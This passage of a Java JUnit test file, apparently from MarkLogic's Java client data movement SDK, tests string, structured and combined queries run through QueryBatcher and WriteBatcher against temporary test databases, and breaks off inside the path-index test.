/* * Copyright 2014-2017 MarkLogic Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.marklogic.client.datamovement.functionaltests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.FileWriter; import java.io.IOException; import java.util.ArrayList; import java.util.Calendar; import java.util.List; import java.util.TreeMap; import java.util.concurrent.TimeUnit; import java.util.logging.Handler; import java.util.logging.Level; import java.util.logging.LogRecord; import java.util.logging.Logger; import javax.xml.namespace.QName; import javax.xml.parsers.ParserConfigurationException; import javax.xml.transform.TransformerException; import javax.xml.xpath.XPathExpressionException; import org.apache.logging.log4j.core.jmx.AppenderAdmin; import org.junit.After; import org.junit.AfterClass; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Ignore; import org.junit.Test; import org.w3c.dom.Document; import org.xml.sax.SAXException; import com.fasterxml.jackson.databind.JsonNode; import com.marklogic.client.DatabaseClient; import com.marklogic.client.DatabaseClientFactory; import com.marklogic.client.DatabaseClientFactory.Authentication; import com.marklogic.client.admin.ExtensionMetadata; import com.marklogic.client.admin.QueryOptionsManager; import com.marklogic.client.admin.ServerConfigurationManager; import com.marklogic.client.admin.TransformExtensionsManager; import com.marklogic.client.datamovement.DataMovementManager; import com.marklogic.client.datamovement.Forest; import com.marklogic.client.datamovement.JobTicket; import com.marklogic.client.datamovement.QueryBatcher; import com.marklogic.client.datamovement.UrisToWriterListener; import com.marklogic.client.datamovement.WriteBatcher; import com.marklogic.client.datamovement.functionaltests.util.DmsdkJavaClientREST; import com.marklogic.client.datamovement.impl.QueryBatcherImpl; import com.marklogic.client.document.JSONDocumentManager; import com.marklogic.client.document.ServerTransform; import com.marklogic.client.io.DOMHandle; import com.marklogic.client.io.FileHandle; import com.marklogic.client.io.Format; import com.marklogic.client.io.InputStreamHandle; import com.marklogic.client.io.JacksonHandle; import com.marklogic.client.io.ReaderHandle; import com.marklogic.client.io.StringHandle; import com.marklogic.client.query.QueryManager; import com.marklogic.client.query.RawCombinedQueryDefinition; import com.marklogic.client.query.RawStructuredQueryDefinition; import com.marklogic.client.query.StringQueryDefinition; import com.marklogic.client.query.StructuredQueryBuilder; import com.marklogic.client.query.StructuredQueryBuilder.Operator; import com.marklogic.client.query.StructuredQueryDefinition; /** * @author ageorge * 
Purpose : Test String Queries * - On multiple documents using Java Client DocumentManager Write method and WriteBatcher. * - On meta-data. * - On non-existent document. Verify error message. * - With invalid string query. Verify error message. * */ public class StringQueryHostBatcherTest extends DmsdkJavaClientREST { private static String dbName = "StringQueryHostBatcherDB"; private static String [] fNames = {"StringQueryHostBatcherDB-1", "StringQueryHostBatcherDB-2", "StringQueryHostBatcherDB-3"}; private static DataMovementManager dmManager = null; private static DataMovementManager moveMgr = null; private static String restServerHost = null; private static String restServerName = null; private static int restServerPort = 0; private static DatabaseClient clientQHB = null; private static DatabaseClient client = null; private static String dataConfigDirPath = null; /** * @throws java.lang.Exception */ @BeforeClass public static void setUpBeforeClass() throws Exception { loadGradleProperties(); restServerPort = getRestAppServerPort(); restServerHost = getRestAppServerHostName(); restServerName = getRestAppServerName(); // Points to top level of all QA data folder dataConfigDirPath = getDataConfigDirPath(); setupJavaRESTServer(dbName, fNames[0], restServerName, restServerPort); setupAppServicesConstraint(dbName); createUserRolesWithPrevilages("test-eval","xdbc:eval", "xdbc:eval-in","xdmp:eval-in","any-uri","xdbc:invoke"); createRESTUser("eval-user", "x", "test-eval","rest-admin","rest-writer","rest-reader","rest-extension-user","manage-user"); // For use with Java/REST Client API client = DatabaseClientFactory.newClient(restServerHost, restServerPort, "admin", "admin", Authentication.DIGEST); dmManager = client.newDataMovementManager(); // For use with QueryHostBatcher clientQHB = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); moveMgr = clientQHB.newDataMovementManager(); } /** * @throws java.lang.Exception */ @AfterClass public static void tearDownAfterClass() throws Exception { System.out.println("In tearDownAfterClass"); // Release clients client.release(); clientQHB.release(); associateRESTServerWithDB(restServerName, "Documents" ); deleteRESTUser("eval-user"); detachForest(dbName, fNames[0]); deleteDB(dbName); deleteForest(fNames[0]); } /** * @throws java.lang.Exception */ @Before public void setUp() throws Exception { System.out.println("In setup"); } /** * @throws java.lang.Exception */ @After public void tearDown() throws Exception { System.out.println("In tearDown"); clearDB(restServerPort); } /* * To test String query with Document Manager (Java Client API write method) and WriteBatcher. 
* @throws IOException * @throws ParserConfigurationException * @throws SAXException * @throws XpathException */ @Test public void testAndWordQuery() throws IOException, ParserConfigurationException, SAXException, InterruptedException { System.out.println("Running testAndWordQuery"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; try { // write docs using Java Client API for (String filename : filenames) { writeDocumentUsingInputStreamHandle(client, filename, "/abs-range-constraint/", "XML"); } setQueryOption(client, queryOptionName); QueryManager queryMgr = client.newQueryManager(); // create query def StringQueryDefinition querydef = queryMgr.newStringDefinition(queryOptionName); querydef.setCriteria("(pop:high OR pop:medium) AND price:medium AND intitle:served"); // create handle to search using Java Client API. JacksonHandle jh = new JacksonHandle(); JsonNode jsonResults = queryMgr.search(querydef, jh).get(); // Verify the results. JsonNode searchResult = jsonResults.get("results").get(0); assertEquals(1, searchResult.get("index").asInt()); assertEquals("/abs-range-constraint/constraint4.xml", searchResult.get("uri").asText()); String contents = searchResult.get("content").asText(); assertTrue("Expected String not available", contents.contains("Vannevar served")); assertTrue("Expected amt not available", contents.contains("12.34")); // Clear the database. clearDB(8000); //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. 
QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch -> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } batchResults.append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); }); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints4.xml")); //Verify Fores Name. assertTrue("Forest name not correct", res[2].contains(fNames[0])); } } catch(Exception e) { System.out.print(e.getMessage()); } finally { } } /* * To test String query with multiple forests. * @throws Exception * */ @Test public void testAndWordQueryWithMultipleForests() throws Exception { String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testAndWordQueryWithMultipleForests"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionName = "absRangeConstraintWithVariousGrammarAndWordQueryOpt.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); setQueryOption(clientTmp, queryOptionName); QueryManager queryMgr = clientTmp.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("0012"); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; //Use WriteBatcher to write the same files. 
WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush batcher.flushAndWait(); // Hold for asserting the callbacks batch contents, since callback are on different threads than the main JUnit thread. // JUnit can not assert on different threads; other than the main one. StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test query by example with WriteBatcher and QueryBatcher. 
* @throws IOException * @throws InterruptedException */ /*public void testQueryByExample() throws IOException, InterruptedException { System.out.println("Running testQueryByExample"); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuffer writebatchResults = new StringBuffer(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder querybatchResults = new StringBuilder(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(qbyexDef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { querybatchResults.append(str) .append('|'); } querybatchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); querybatchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitTermination(30, TimeUnit.SECONDS); if (queryBatcher1.isStopped()) { if (!querybatchFailResults.toString().isEmpty() && querybatchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = querybatchResults.toString().split("\\|"); assertTrue("URI returned not correct", res[0].contains("/batcher-contraints1.json")); assertEquals("Bytes Moved","0", res[1]); assertEquals("Batch Number","0", res[3]); } }*/ /* * To test that RawStructuredQueryDefinition can be mixed in with a StructuredQueryBuilder * @throws Exception * * TODO modify this test for Git 591, once 591 is fixed/addressed. 
* */ @Ignore public void testRawStructuredQDWithQueryBuilder() throws Exception { String testMultipleDB = "RawStrutdQDWithQBuilderDB"; String[] testMultipleForest = {"RawStrutdQDWithQBuilderDB-1", "RawStrutdQDWithQBuilderDB-2", "RawStrutdQDWithQBuilderDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; FileWriter writer = null; BufferedReader UriReaderTxt = null; FileReader freader = null; String fileName = "RawStrutdQDWithQBuilderDB.txt"; try { System.out.println("Running testRawStructuredQDWithQueryBuilder"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"curbappeal.xml", "flipper.xml", "justintime.xml"}; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; //Use WriteBatcher to write the same files. WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); wbatcher.add(filenames[2], contentHandle3); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); String options = "<options xmlns=\"http://marklogic.com/appservices/search\">" + "<constraint name='industry'>"+ "<value>"+ "<element name='industry' ns=''/>"+ "</value>"+ "</constraint>"+ "</options>"; RawStructuredQueryDefinition rsq = qb.build(qb.term("neighborhoods"), qb.valueConstraint("industry", "Real Estate")); String comboquery = "<search xmlns=\"http://marklogic.com/appservices/search\">" + rsq.toString() + options + "</search>"; RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition((new StringHandle(comboquery)).withFormat(Format.XML)); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.withBatchSize(1); writer = new FileWriter(fileName); queryBatcher1.onUrisReady(new UrisToWriterListener(writer)) .onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); writer.flush(); if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. 
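      // The UrisToWriterListener above wrote one matched URI per line to the output file;
      // read those lines back and compare them against the expected URI set.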
freader = new FileReader(fileName); UriReaderTxt = new BufferedReader(freader); TreeMap<String, String> expectedMap = new TreeMap<String, String>(); TreeMap<String, String> uriMap = new TreeMap<String, String>(); expectedMap.put(filenames[0], "URI"); expectedMap.put(filenames[1], "URI"); String line = null; while ((line = UriReaderTxt.readLine()) != null) { System.out.println("Line read from file with URIS is" + line); uriMap.put(line, "URI"); } assertTrue("URIs not read correctly from testRawStructuredQDWithQueryBuilder method ", expectedMap.equals(uriMap)); } catch (Exception e) { System.out.println("Exceptions thrown from Test testRawStructuredQDWithQueryBuilder"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); try { if (writer != null) writer.close(); if (UriReaderTxt != null) UriReaderTxt.close(); if (freader != null) freader.close(); // Delete the file on JVM exit File file = new File(fileName); file.deleteOnExit(); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } clientTmp.release(); } } /* * To test that RawStructuredQueryDefinition can be used withQueryBatcher * Store options from a file to server. * Read a query from a file into a handle * Create a RawCombinedQueryDefinition from handle and options, to be used in QueryBatcher Job. * * @throws Exception * */ @Test public void testRawCombinedQueryXMLWithWriteOptions() throws Exception { String testMultipleDB = "RawCombinedQueryXMLDB"; String[] testMultipleForest = {"RawCombinedQueryXMLDB-1", "RawCombinedQueryXMLDB-2", "RawCombinedQueryXMLDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testRawCombinedQueryXMLWithWriteOptions"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String queryOptionFileName = "valueConstraintWithoutIndexSettingsAndNSOpt.xml"; String queryName = "combinedQueryNoOption.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; String combQueryFileDir = dataConfigDirPath + "/combined/"; //Use WriteBatcher to write the same files. 
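      // Five constraint documents are written below; with the stored options and the combined
      // query, only constraint5.xml is expected to match (asserted further down).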
WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); wbatcher.add(filenames[2], contentHandle3); wbatcher.add(filenames[3], contentHandle4); wbatcher.add(filenames[4], contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); setQueryOption(clientTmp, queryOptionFileName); // get the combined query File file = new File(combQueryFileDir+queryName); // create a handle for the search criteria FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.XML); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle, queryOptionFileName); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains(filenames[4])); // Read the document and assert on the value DOMHandle contentHandle = new DOMHandle(); contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); Document readDoc = contentHandle.get(); System.out.println(convertXMLDocumentToString(readDoc)); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); } } catch (Exception e) { System.out.println("Exceptions thrown from testRawCombinedQueryXMLWithWriteOptions"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. 
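      // Tear-down: restore the REST server's original database association and drop the
      // temporary forests and database created for this test.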
associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test that RawStructuredQueryDefinition can be used withQueryBatcher - JSON file * Read a query from a combined file into a handle. combinedQueryOptionJSON.json contains query, options in JSON format. * @throws Exception * */ @Test public void testRawCombinedQueryJSON() throws Exception { String testMultipleDB = "RawCombinedRangeJsonDB"; String[] testMultipleForest = {"RawCombinedRangeJsonDB-1", "RawCombinedRangeJsonDB-2", "RawCombinedRangeJsonDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testRawCombinedQueryJSON"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; String combinedQueryFileName = "combinedQueryOptionJSON.json"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + "/data/"; String combQueryFileDir = dataConfigDirPath + "/combined/"; //Use WriteBatcher to write the same files. WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); wbatcher.add(filenames[2], contentHandle3); wbatcher.add(filenames[3], contentHandle4); wbatcher.add(filenames[4], contentHandle5); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); // get the combined query File file = new File(combQueryFileDir+combinedQueryFileName); // create a handle for the search criteria FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.JSON); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. 
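      // combinedQueryOptionJSON.json bundles the query and its options together, which is why
      // newRawCombinedQueryDefinition above was called without a separate options name.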
QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains(filenames[4])); // Read the document and assert on the value DOMHandle contentHandle = new DOMHandle(); contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); Document readDoc = contentHandle.get(); System.out.println(convertXMLDocumentToString(readDoc)); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); } } catch (Exception e) { System.out.println("Exceptions thrown from testRawCombinedQueryJSONWithWriteOptions"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test that RawStructuredQueryDefinition can be used withQueryBatcher - Combined file * Read a query from a combined file into a handle. * Create a RawCombinedQueryDefinition from handle, to be used in QueryBatcher Job. * * @throws Exception * */ @Test public void testRawCombinedQueryPathIndex() throws Exception { String testMultipleDB = "RawCombinedRangePathDB"; String[] testMultipleForest = {"RawCombinedRangePathDB-1", "RawCombinedRangePathDB-2", "RawCombinedRangePathDB-3"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testRawCombinedQueryPathIndex"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); createForest(testMultipleForest[1], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"pathindex1.xml", "pathindex2.xml"}; String combinedQueryFileName = "combinedQueryOptionPathIndex.xml"; clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); String dataFileDir = dataConfigDirPath + 